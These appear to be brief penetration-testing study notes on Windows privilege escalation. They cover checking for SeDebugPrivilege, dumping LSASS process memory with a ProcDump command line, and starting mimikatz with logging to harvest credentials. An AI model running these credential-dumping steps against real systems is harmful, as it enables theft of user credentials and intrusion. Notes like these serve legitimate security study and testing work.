to run a particular application or service or assist with troubleshooting, a user might be assigned the SeDebugPrivilege instead of adding the account into the administrators group.
In an elevated shell
whoami /priv
shows SeDebugPrivilege
We can use ProcDump from the SysInternals suite to leverage this privilege and dump process memory.
dumping Local Security Authority Subsystem Service (LSASS) process, which stores user credentials after a user logs on to a system.
Dumping lsass using procdump
procdump.exe -accepteula -ma lsass.exe lsass.dmp
Start mimikatz
log - all output saved to a .txt file. Important while dumping creds